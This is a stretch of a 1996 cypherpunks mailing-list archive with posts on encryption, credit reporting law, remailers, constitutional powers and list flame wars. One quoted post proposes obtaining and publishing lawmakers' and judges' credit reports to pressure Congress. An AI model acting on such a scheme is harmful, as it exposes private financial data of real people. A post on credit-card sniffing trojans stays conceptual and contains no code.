separation are, however, addressed by PGPhone, or rather should one say
made "unaddressable". 
 
 
--tallpaul 
 
PS: Olsen's post did have some good themes on the nature of the internet
"as public library." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 6 Feb 1996 08:05:49 +0800
To: cypherpunks@toad.com
Subject: Re: "PGP-Scape"? (was Re: Our "New Order")
In-Reply-To: <199602050334.WAA17133@UNiX.asb.com>
Message-ID: <199602050621.AAA00111@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> There's also less worry about secure transactions, since if 
> everything's encrypted it's harder to tell if a transaction is taking 
> place, viewing porno or subversive or religious, literature,  or if
> you're just reading something mundane.

I think I must be missing something here.  Aren't you describing an SSL 
web server?  Different algorithms, but basically the same idea?

> So is fast-than-light travel, but only if it's implemented.

Netscape 2.0 is out for real -- everyone can now pick their certs.  GAK 
just got harder.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 6 Feb 1996 07:57:34 +0800
To: cypherpunks@toad.com
Subject: Re: A Sign of the Future
In-Reply-To: <Pine.BSD.3.91.960204233142.13680B-100000@ahcbsd1.ovnet.com>
Message-ID: <199602050625.AAA00118@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>     Concerns about privacy and anonymity are outdated. Cypherpunks 
>     think they are rebels with a cause, but they are really senti- 
>     mentalists. 

I'm not much for big conspiracy theories, but I like the little ones.

If this was really in Wired, do you think it was written before or after 
Tim dissed that magazine here?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Feb 1996 08:08:40 +0800
To: cypherpunks@toad.com
Subject: Fair Credit Reporting Act and Privacy
Message-ID: <ad3aea2e1b021004e221@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[I urge people to put thread names in the subject lines, and not just leave
the subjects as "Re:" or "Your mail." I have added a subject line.]

At 5:58 AM 2/5/96, Karl Ike wrote:
>It is impossible to get changes in the Fair Credit Reporting Act in the
>traditional way. Credit reporting agencies have far too much personal
>information that is passed out with incrediable ease at the consumers expense.
>
>I have a suggestion!
>
>Today, with TRW, Equifax and TransUnion's vast network, it is easy to obtain
>anyone's credit report from various sources. Do you think if someone,
>outside of the USA, obtained the credit reports on half, maybe all, of the
>US Senators, congressmen, judges, etc, and published them in their entirity,
>on the internet, from outside the US, would get their attention? Then there
>would be changes, overnight, protecting the right of privacy! Let them
>become the victim of credit reporting agencies once and shit will happen
>overnight.

"Protecting the right of privacy"? If I tell Joe Bob that you welshed on a
debt made in the past, something that the person you welshed on has
informed me of, how is this a violation of your right of privacy?

Better yet, abolish the laws about so-called "Fair Credit Reporting."

If Tim's Pretty Good Credit Reporting knows that Joe Blow filed for
bankruptcy in 1975, by what right should men with guns come to his file
cabinets and announce that he may not reveal true information that is older
than, say, 8 years? Facts are facts. Not just for 8 years, or even 20
years. Debts incurred 30 years ago and not paid may still be useful bits of
information in deciding whether to extend credit to a person.

And even possibly untrue things are not the main justification for the
FCRA. The FCRA is _not_ primarily designed to correct wrong information,
but to place time limits on correct information. It limits speech. And it
interferes with rational economic decisions.

Fortunately, strong crypto and cyberspatial data havens will make
enforcement of the FCRA increasingly difficult.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 5 Feb 1996 15:28:19 +0800
To: cypherpunks@toad.com
Subject: Let's get back to crypto already (enough with the FUDism)
Message-ID: <199602050540.AAA19506@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject says it.

Idle talk can wait until legislation doesn't matter... and it won't 
when there's freely available source and binaries for a secure 
telnet, a private/anonymizing web browser/server/proxy, terminal and 
bbs programs, file transfers, etc.  I think these are at the moment a 
bit more important than digital cash (when these exist, e-cash will 
follow).

There's lots of work to be done.

Whatever happened to "cypherpunks write code"? it seems that various 
governments are writing laws a lot faster...

--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 6 Feb 1996 08:08:32 +0800
To: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: RE: Sometimes ya just gotta nuke em
Message-ID: <v02140b04ad3b2b30275d@[165.254.158.237]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:33 2/3/96, "A. Padgett Peterson, P.E. Information Security"
<PADGETT@hobbe wrote:

>Tim rote:
>>At 4:12 AM 2/3/96, Rich Graves wrote:
>>>Who holds up the nuking of Hiroshima and Nagasaki as great victories
>>>against tyranny?
>>Since you ask, I do.
>
>And the biggest secret of the war was that "Fat Man" was the *last* A-bomb
>we had or could build for about a year (had taken several *years* to
>separate enough fissionable material for the three via two entirely
>different processes).
>
>To me this is the great strength of the USA: given a theoretical problem, we
>will develop a hundred different solutions, try them all in parallel, and at
>least one will work.

I agree - Not only were there two different separation methods but the two
bombs dropped on Japan were of different designs (I think that the
Hiroshima bomb was the same design as the land test version and the
Nagasaki one was the untested design [so that if used, there would have
been a tested design for the first drop]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 6 Feb 1996 00:14:32 +0800
To: cypherpunks@toad.com
Subject: Indecent Trash
Message-ID: <199602042352.AAA09555@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 10 Jan 96 at 10:42, t byfield wrote:

> At 10:26 PM 1/9/96, Alexander 'Sasha' Chislenko wrote:
> 
> >- Landfills:  They are probably the richest source of detailed 
> >   historical information that is not obtainable from any 
> >   other source and can be used to reconstruct the detailed 
> >   history of society, economy, technology and any single 
> >   person with incredible detail.

> I ain't holding my breath until someone develops a search 
> engine for Fresh Kills.

I can see it now... about the time that Grandson of Altavista 
finally yields a URL for Jimmy Hoffa's body in some dump 
somewhere the government will have figured out that it's so 
much simpler to catalog the stuff on the way IN, when all the 
artifacts are fresh and unmixed. While we're all watching what 
the government does to intercept packets, they will be routing 
*trash* packets through mysterious "garbage routers."  

As the stink grows stronger, someone will conceive of anonymous 
trash forwarders. They will accept unidentified trash, no 
questions asked, anonymize it with random DNA and fingerprint 
whorls, and sneak it into public trash receptacles. DNA 
generators will enable the mischievous to plant fabricated 
indications that Hillary did indeed have something going with 
Vince, the late Khomeini (hey, hard is hard, right?) as well as 
legions of four-footed friends, confirming the suspicions of 
multitudes.

As the piles of trash-based data grow, some Senator from
Nebraska will sound the alarm that kids are too easily exposed
to the indecent signs of private behavior retrievable on the
Net and will propose draconian measures to hold everyone
responsible for their contributions to the city landfill. 
Public receptacles will be closed. Trash will only be collected 
from registered Identifed Surplus Providers (ISP's). $250,000 
fine for disposing of a condom in a dump accessible from the 
Internet... 10 years in prison for carelessly tossing those 
nasty Polaroids in the kitchen compactor. The trash of the world
will have to be made safe for kids to view.

Everything will be a lot easier to trace and control if the
garbage input is fully identified. Barcodes on trash bags
might do for starters. Access to the garbage system might have
to be restricted to those 18 and over. Trash collectors could
be made responsible for content, drafting them without pay into
the ranks of the trash police. People could be encouraged to
report suspicious trash, and trash-related activities like
neighbors sneaking out at night to place an innocent-looking
compactor bag down the block with someone else's trash.  

For their own protection, youngsters might be required to retain 
all their garbage until age 18 and then, in a solemn ceremony 
worthy of the true significance of coming of age, pitch it all 
(duly anonymized to prevent abuse of minor indiscretions) from 
their new position as lawful participants in the world garbage 
system, friends and well-wishers trying to applaud and hold their 
noses at the same time (try it -- if you're not careful you can 
break your own nose, but hey, that'll work, too!). Who knows? 
Maybe Heinlein's advocacy of keeping kids in a barrel and feeding 
them through a hole until age 18 will enjoy resurgence among the 
compulsively protective while the Web meanwhile will provide real 
time underground data on Heinlein's rpm rate.

Protecting the trash of youth will, however, give rise to the 
hiding of adult trash among that of the underaged. The government
will have to root out offenders and "impute" suspicious trash 
to the parents. Those with no visible source of trash will of 
course be suspect, and will have to emit innocent trash to 
cover themselves. This will give rise to the practice of "trash 
laundering," in which agents convert nasty trash to innocuous 
trash that may then be tossed into any monitored, controlled 
channels with no repercussions.

Trash laundering will become a grave offense to the 
accompaniment of government and Ad Council PSA's and free 
brochures from Pueblo, Colorado. Blatant offenders who have 
fled to foreign climes will be kidnapped, some will be tortured,
because the War Against Filth will be a moral commitment of the 
national body. Foreign governments headed by suspected trash 
traffickers will be toppled in quickie invasions, their leaders 
brought back in chains to disappear into federal dungeons. Public 
debate will center on the legalities and rationalizations of 
using the military in policing domestic trash, while agencies 
such as the FBI cry for more budget to fight the scourge that 
threatens the decency of the nation's repositories.

Control of trash will spread inevitably to control of liquid 
wastes, whereupon a terrible discovery will be made: Everyone, 
but everyone, emits unspeakable bodily products. At that point 
the government will have no choice but to reluctantly declare 
everyone an outlaw and execute the populace.

It's all as logical as what happens when you introduce division 
by zero way down at the bottom of the complex equation where it 
isn't so noticeable.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMPS/PEjw99YhtpnhAQH1UQH5AdXBd7AvG6xT7x/cTXf5W1cAUXzoJ+GB
N0/SPrdoJnbUSN5LkJDwoVwA/eiL6/LVN9CjtmQwmydyBysM7M/7Xw==
=q+CF
-----END PGP SIGNATURE-----










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 6 Feb 1996 00:05:51 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: Encryption and Backups
Message-ID: <v02140b00ad3b48c5ea0e@[165.254.158.226]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:33 2/4/96, John Pettitt wrote:

>On Sun, 4 Feb 1996, Alan Olsen wrote:
>
>> Something that I have not seen addressed is the need for strong encryption
>> in backup software.
>>
>> Most backup software has an "encryption" option, but I have seen few that
>> have anything resembling strong encryption.  Furthermore, I have seen no
>> real push for strong encryption for backups at all.
>> ...
>> Might be an idea for a product there...  (And you can bet law enforcement
>> would throw a hissy fit about its existence.)
>>
>CP Backup (part of PC Tools for Central Point aka Symantec) has DES. As to
>how good the implementation is: I have no idea.


Retrospect (a Mac Tape/Floppy Backup Utility) also has an Encryption Option
I think.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Mon, 5 Feb 1996 08:57:18 +0800
To: cypherpunks@toad.com
Subject: None
Message-ID: <199602050015.BAA10473@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


    >> > Could someone tell me how to quit this list, I just dont >
    >> have the time to read anything that is being sent to it.
    >> 
    >> Yes. You can turn your modem off :)
    >> 

> Hey Boffo, Don't be an idiot!!  It is hard to turn off your
> modem when you are on a university network.  Don't be so
> quick to be a smart ass.  If you don't have anything
> productive to say then shut the fuck up!!

	Wow.. Looks like someone didn't get their nap. Maybe someday
he'll figure out about anonymous remailers too and quite trying to
argue with Mr. Boffo. :)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 5 Feb 1996 16:24:15 +0800
To: cypherpunks@toad.com
Subject: Question of Congressional Lawmaking Power (fwd)
Message-ID: <199602050759.BAA10465@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From owner-ctlug@ssz.com Mon Feb  5 01:59:09 1996
From: Jim Choate <ravage@ssz.com>
Message-Id: <199602050759.BAA10442@einstein.ssz.com>
Subject: Question of Congressional Lawmaking Power
To: ctlug@ssz.com (CT-LUG Mailing List)
Date: Mon, 5 Feb 1996 01:59:02 -0600 (CST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 7702      
Sender: owner-ctlug@ssz.com
Precedence: bulk
Reply-To: ctlug@ssz.com


Hi all,

To those with no interest I apologize. To those who were at the meeting this
evening discussing the limitations of Congress and the purported 'elastic
clause', this is what I found:


---------------------------------------------------------------------------
  
				ARTICLE I. 
 
	[Powers of Congress.] 
 
Section 8.  The Congress shall have Power To lay and collect Taxes, 
Duties, Imposts and Excises, to pay the Debts and provide for the common 
Defence and general Welfare of the United States; but all Duties, Imposts 
and Excises shall be uniform throughout the United States; 
	To borrow Money on the credit of the United States; 
	To regulate Commerce with foreign Nations, and among the several 
States, and with the Indian Tribes; 
	To establish a uniform Rule of Naturalization, and uniform Laws 
on the subject of Bankruptcies throughout the United States; 
	To coin Money, regulate the Value thereof, and of foreign Coin, 
and fix the Standard of Weights and Measures; 
	To provide for the Punishment of counterfeiting the Securities 
and common Coin of the United States; 
	To establish Post Offices and post Roads; 
	To promote the Progress of Science and useful Arts, by securing 
for limited Times to Authors and Inventors the exclusive Right to their 
respective Writings and Discoveries; 
	To constitute Tribunals inferior to the Supreme Court; 
	To define and punish Piracies and Felonies committed on the high 
Seas, and Offences against the Law of Nations; 
	To declare War, grant Letters of Marque and Reprisal, and make 
Rules concerning Captures on Land and Water; 
	To raise and support Armies, but no Appropriation of Money to 
Use shall be for a longer Term than two Years; 
	To provide and maintain a Navy; 
	To make Rules for the Government and Regulation of the land and 
naval forces; 
	To provide for calling forth the Militia to execute the Laws of 
the Union, suppress Insurrections and repel Invasions; 
	To provide for organizing, arming, and disciplining the Militia, 
and for governing such Part of them as may be employed in the Service of 
the United States, reserving to the States respectively, the Appointment 
of the Officers, and the authority of training and Militia according to 
the discipline prescribed by Congress; 
	To exercise exclusive Legislation in all Cases whatsoever, over 
such District (not exceeding ten Miles square) as may, by Cession of 
particular States, and the Acceptance of Congress, become the Seat of 
Government of the United States, and to exercise like authority over all 
Places purchased by the Consent of the Legislature of the State in which 
the Same shall be, for the Erection of Forts, Magazines, Arsenals, dock-Yards, 
and other needful Buildings; -- And 
	To make all Laws which shall be necessary and proper for carrying 
into execution the foregoing Powers, and all other Powers vested by this 
Constitution in the Government of the United States, or in any Department or 
Officer thereof. 

---------------------------------------------------------------------------

I believe that the section that was refered to is the last sentence
regarding the making of all laws necessary for carrying out the powers
detailed here and elsewhere in the Constitution. This article clearly states
that it is not an open ended empowerment. It covers only those items
specificaly covered in the body of the Constitution. At the time it was
written it was clear that the founding fathers did not want a federal
government which was not hampered or constrained in its ability to pass laws
and carry out duties. If a court or body makes the assertion that this
article empowers Congress to make any law then they are sadly misinformed
and possibly intentionaly misrepresenting the intent of the founding fathers
and the limitations on Congress placed there by them.

This article no more authorized (for example) the creation of the DEA, FDA,
or EPA than it authorizes them to take property without just compensation.
If this was taught you either through a textbook or a public school then
feel cheated and lied to, you were (possibly with premeditation).

---------------------------------------------------------------------------

And in regards to the limitation of federal lawmaking and questions of
jurisdiction covered in the 10 amendments...

----------------------------------------------------------------------------

 
				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
 
 
 
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 
------------------------------------------------------------------------------

The intent is clear. If there is a question of jurisdiction then it will
ALWAYS fall to the states or the people, and NEVER to the federal
government. In short, the federal government and the Supreme Court are not
and were never intended to be the last word on anything in this country. The
10th clearly leaves that to the states and the people.

Neither of these Amendments have been tested or used in a court in this
country for 200 years. This is a telling tale. The courts and legislative
bodies (as well as any reasonable person) will see immediately that the
federal government has usurped powers and duties not theirs to execute short
of a constitutional amendment. This not only includes laws allowing the
seizing of private property for public use without just compensation
(irrespective of the source of that private property) but drug laws, food
regulation laws, environmental laws, etc. The last time Congress acted in a
constitutional manner regarding this was the amendments dealing with
prohibition and its repeal. Since that time Congress and the courts have
taken powers reserved for the states and the people and acted upon them
without authorization. In short the Congress of the US has acted in a manner
assuming exemption from constitutional limitations since the late 20's. What
this country needs is a legal test of both the 9th and 10th amendments.

Questions regarding Internet and free speech are immediately resolved as
non-issues on the federal level. It also makes jurisdictional extensions
such as Tennessee arresting and prosecuting a person in California for
downloading files (whatever they might contain) a non sequitar unless money
is exchanged (in which case Congress may tax it, not prohibit it). It also
clearly prohibits outside entities such as Germany from prosecuting anyone
in the US for their actions on the Internet. If Germany wishes to constrain
the content of Internet that is fine. It is between Germany and its people.
Another example is gun ownership. It is not a federal issue. It is a state
issue and should be resolved on a state by state level. Congress has no more
authority vested by the Constitution to limit a persons ownership of a
water pistol or a atom bomb, and this is the way it should be. The issue is
one of a state level unless Congress wishes to propose a constitutional
amendment changing or revoking the 2nd. (again as it should be).

I personaly refuse to support any political party which does not support and
intend on testing both of these amendments. At this time there is not one
political party (even the Libertarian) who will touch this issue. I strongly
suggest that you demand support for these two amendments from any legislator
that you might support.


                                                  Jim Choate
                                                  ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Tue, 6 Feb 1996 03:00:25 +0800
To: cypherpunks@toad.com
Subject: Marshall McLuhan and encryption...
Message-ID: <9602050736.AA08295@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



>  Nick's a big shot at Wired magazine.  So it should be no surprise 
>  to learn that Wired attacked cypherpunks in its 01 96 issue.  In 
>  a fake interview with "Wired's patron saint," Marshall McLuhan is 
>  made to say (p 130): 
> 
>    Concerns about privacy and anonymity are outdated. Cypherpunks 
>    think they are rebels with a cause, but they are really senti- 
>    mentalists. 

Well, maybe McL. would have spit such nonsense, very characteristical of him.

"The media is the message" is among the biggests con jobs performed on humanity.
It's like having a guy dying form thirst and telling him: "The pipe is the beverage"...

One fine example of the destruction of reason.

If a PGP encrypted message was sent to Mr.McLuhan, could he see if it is a
"there is a contract on you..." or "happy new year" or "I love you..."


To any Cypherpunks, the media *IS NOT* the message!

Dear Wired peoples and Mr. McLuhan: get lost!

>    The era of politics based on private identities, anonymous indi- 
>    viduals, and independent citizens began with the French Revolution 
>    and Napoleon's armies...and ended with Hitler....  The cypherpunks 
>    are still marching to the same martial music. 

     He is partially right.  With Renaissance, came the idea that Reason and human mind 
were powerfull and that knowledge, because man's only survival tool is reason, is a value 
to pursue.  

But french revolution did not convey theses ideas, neither
did Napoleon.  And Hitler definitely not.   
All of the three were, ultimately, collectivists or looters.

Therefore, the author of the text is guilty of setting up straw man and of
context blanking.

JFA
Reality Is.  Existence exists.  Words have a precise meaning.  $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Tue, 6 Feb 1996 12:16:32 +0800
To: cypherpunks@toad.com
Subject: Re: CONTEST: Name That Program!
Message-ID: <v03004909ad3b8474578d@[129.46.82.92]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:10 AM 1/31/96, Bill Stewart wrote:
>At 11:45 AM 1/30/96 -0500, Nathaniel Borenstein <nsb@nsb.fv.com> wrote:
>> In fact, I'd settle for getting onto 10% of the machines, although I
>> suspect I could get onto more like 80% without raising a sweat.

If I were you, Nathaniel, I'd drop that petard of yours on the ground, grab
a very absorbent hankie and run like hell. ;)

>You've alleged that Macs and Unixen should be about as easy as Windows
>machines to crack with your CardShark.  I disagree - most Mac users I
>know have been using virus protectors more consistently and reliably
>than DOS/Windows users.  However, if their virus software only stops
>known viruses, rather than anything modifying critical resources,
>you might get away with it for long enough to surf some numbers.
 [elided]

Actually, for those who don't know, one of the most ubiquitous anti-viral
utilities for Macs (Symantec Antivirus for Macintosh, aka "SAM") also
offers a mode that constantly watches for any generic attempt to modify
crucial file/app/system resources -- and offers the opportunity to deny
such attempts. Thus, it doesn't _only_ offer protection against "known"
attacks. It even specifies which application/virus is trying to modify
which file, allows the user to teach it that certain mods are verboten and
halts activity until the user decides how to proceed. This makes it all but
impossible (if a Mac is so-protected) to even introduce a
trojan-keystroke-sniffing-credit-card-transmitter, much less use it to take
over the TCP stack (MacTCP) without the user's knowledge.

As for FV's recent "discovery:"
[a] I'm glad if FV _really_ wants to educate the public, but I hope they
find a better way next time than a "hey, we found this really simple way to
hack the universe, but we're not telling all you 13-year-old juvenile
delinquent hacker-wannabes" broadcast (talk about yer invitations!),
[b] confused why NB didn't anticipate the fuss and prepend a short
disclaimer onto his posting of it to cpunx (how about _thrice_ burnt,
Nathaniel?),
[c] unimpressed by all the vitriol it stirred up and the glee exhibited by
everyone in slamming Nathaniel and Co. (lighten up, even if it was
deserved) and
[d] bummed that no-one remembered my keycapture utility survey of nearly a
year and a half ago...as in "gee, I wish _I'd_ thoughta that." ;)

Frankly, I wonder if, in the long run, FV's stunt hasn't wrought more harm
than good: I got a late-night call from a worried but clueless friend
asking me to clarify this "credit card sniffer thing" he'd heard about from
someone else: he was all worried that there was an invisible virus on his
machine. >sigh< It's seems the brush has been set afire: now which way will
the winds blow?

Cheers,

   dave

____________________________________________________________________________
"With annual interest, compounded every nanosecond, that'll be $0.02000018."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andreas@artcom.de (Andreas Bogk)
Date: Mon, 5 Feb 1996 21:10:05 +0800
To: cypherpunks@toad.com
Subject: verification of randomness
Message-ID: <y8apwbulbrd.fsf@horten.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi...

I've built a random number generator based on the noise of a Zener
diode. Now I'd like to verify it's correct operation. I'd be very
grateful if someone could point me to existing software for randomness
tests or additional tests not mentioned in Knuth.

I'll make the design of the generator available as soon as I've
verified it's operation.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMRVyMUyjTSyISdw9AQHUSQP/UK3ubued8U3iB4FDO5WAsiEV+F2/100O
0w42NSZbry5+07u+l9eJN/ogpECZ9yIltWM7slkKZS0q0TGQ4zCucHoDPKhubMHs
gQqjkmgXTs0drqRn+BYPoQFYPyiYLeBr67BRqsQFyp7neuMC5NN10NpL9y4bcAS2
8NBB7yFh9d0=
=RD04
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 6 Feb 1996 20:11:25 +0800
To: cypherpunks@toad.com
Subject: Re: FV has 91 day lag between sales and payment
In-Reply-To: <Pine.LNX.3.91.960131205343.9803A-100000@offshore.com.ai>
Message-ID: <9602061157.AA07794@ nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.cypherpunks: 31-Jan-96 FV has 91 day lag between s..
Vincent Cate@offshore.co (4108*)

> The FV 90 day lag is their main downside in my opinion (though defaulting
> to not paying if the customer does not answer email is another problem). 
> So FV does not take any risk at all - and a merchant has to have enough
> extra capital to let 3 months worth of sales sit at FV. Some ideas for
> ways that they or someone else could improve on this: 

Actually, we've gotten approval from our banking partners to waive the
holding time entirely for customers who fill out an application and win
the bank's approval.  We're working on the technical and logistical
aspects of this right now.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 6 Feb 1996 08:08:46 +0800
To: paralax@alpha.c2.org
Subject: Re: Nuke em if ya got em "TCMay"
In-Reply-To: <199602041303.FAA05924@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.960205062544.8568E-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



    attila sez:

	It is not whether paralax does not know shit from beans, but that
    he proves to all that he would prefer to censor TCMay and James A.
    Donald than listen to their opinions, despite the fact he posted his
    own rather trivial and absurd point. 

    political correctness and the liberal news intrepretations of "all
    men are created equal" with reverse discrimination, destruction of
    the work ethic for the dole, and the New World Order whose need is
    more and more cheaper labor, even to the point of disenfranchising 
    whole element of America society to achieve a worker's underclass is 
    the shit part of beans and shit.

	with this, I suppose I have been entered upon your "list" of 
    enemies of the 'statist' nation along with TCMay and James A. Donald,
    and that my prejudged conviction and sentence requires me to write
    30,000 lines of debugged C source code before the end of this year. 

	how about 30,000 lines of debugged Ada source for you?  --while
    I add you to procmailrc:

    	    :0:
	    * ^[FRST].*paralax
	    assholes

	have a nice day, hopefully enlightening

		attila 
__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.
__________________________________________________________________________

On Sun, 4 Feb 1996 paralax@alpha.c2.org wrote:

> On Date: Sat, 03 Feb 1996 22:20:52 -0800 James A. Donald Wrote:
> 
> At 03:39 PM 2/3/96 -0800, paralax@alpha.c2.org wrote:
> 
> P> Mr. Hayes MAY have used a condescending tone but you have exposed your
> P> racist roots again.  First you embarrass yourself with you lack of knowledge,
> 
> JAD> Paralax does not know shit from beans.  He presumably imagines that Tim is
> JAD> "embarrassed" because Tim's knowledge of the historical facts differs from
> JAD> those facts dreamed up by the usual crew of apologists for totalitarian terror.
> 
> JAD> James A. Donald
> 
> Historical facts and or personal interpretations thereof were never called in to question by me.  I took umbrage with Mr. May's insulting, insensitive and racist comments about Jews and the Japanese.  Whether Mr. May's is personally embarrassed by his public display of ignorance and bigotry matters not.  He did indeed embarrass himself on an 'International Stage'.
> 
> I may not know shit from beans (actually I do) but I do know cultural  insensitivity, racism, bigotry and ignorance when I see it displayed so blatantly.  I encouraged Mr.
> May to return to topics 'cipher' before further embarrassment ensues.  I urge you to do
> likewise.
> 
> A. Paralax View
> 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 6 Feb 1996 01:23:10 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199602051450.GAA04545@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
